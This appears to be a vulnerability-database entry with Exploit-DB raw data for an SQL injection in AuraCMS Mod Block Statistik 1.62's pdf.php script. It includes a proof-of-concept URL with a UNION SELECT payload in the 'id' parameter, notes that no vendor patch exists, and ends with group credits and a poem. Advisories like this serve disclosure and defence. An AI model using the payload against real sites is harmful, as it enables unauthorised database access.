AuraCMS (pfd.php) SQL Injection Vulnerability

vendor:

AuraCMS Mod Block Statistik

by:

Arianom

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: AuraCMS Mod Block Statistik

Affected Version From: 1.62

Affected Version To: 1.62

Patch Exists: NO

Related CWE: N/A

CPE: a:auracms:auracms_mod_block_statistik

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

AuraCMS (pfd.php) SQL Injection Vulnerability

A vulnerability in AuraCMS Mod Block Statistik version 1.62 allows an attacker to inject arbitrary SQL commands via the 'id' parameter in the 'pdf.php' script.

Mitigation:

Currently manufacturers do not provide patches or upgrades.

Source

Exploit-DB raw data:

-----------------------------------------------------------------------
AuraCMS (pfd.php) SQL Injection Vulnerability
-----------------------------------------------------------------------
Author		: Arianom (arianom@indonesiancoder.com)
Homepage	: http://indonesiancoder.com
Vendor		: http://www.auracms.org/
Software	: AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html
Version		: 1.62
Date		: November 22, 2010
-----------------------------------------------------------------------



I.  POC & Exploit
-----------------------------------------------------------------------
http://localhost/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7

II. Refrence
-----------------------------------------------------------------------
AuraCMS 1.62 (stat.php) Remote Code Execution Exploit  : http://www.exploit-db.com/exploits/4933/

III. Vendor patch
-----------------------------------------------------------------------
Currently manufacturers do not provide patches or upgrades.

IV. Credits
-----------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Kill-9 Crew ~ MC Crew 
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ N4ck0 ~ Yurakha ~ aN93l1c ~  Mboys ~ Contrex ~  n4KuLa_ 
k4L0ng666 ~ Xr0b0t ~ kido ~ t3ll0 ~ cimpli ~ Pathloader

V. Poem
-----------------------------------------------------------------------
Kami adalah manusia biasa yang gemar belajar.
Kami suka mempelajari hal apa saja, termasuk sesuatu yang menurut orang lain aneh atau asing bagi mereka.
Kami disini hanya ingin berbagi, bukan untuk bersaing.

Indonesian Coder Family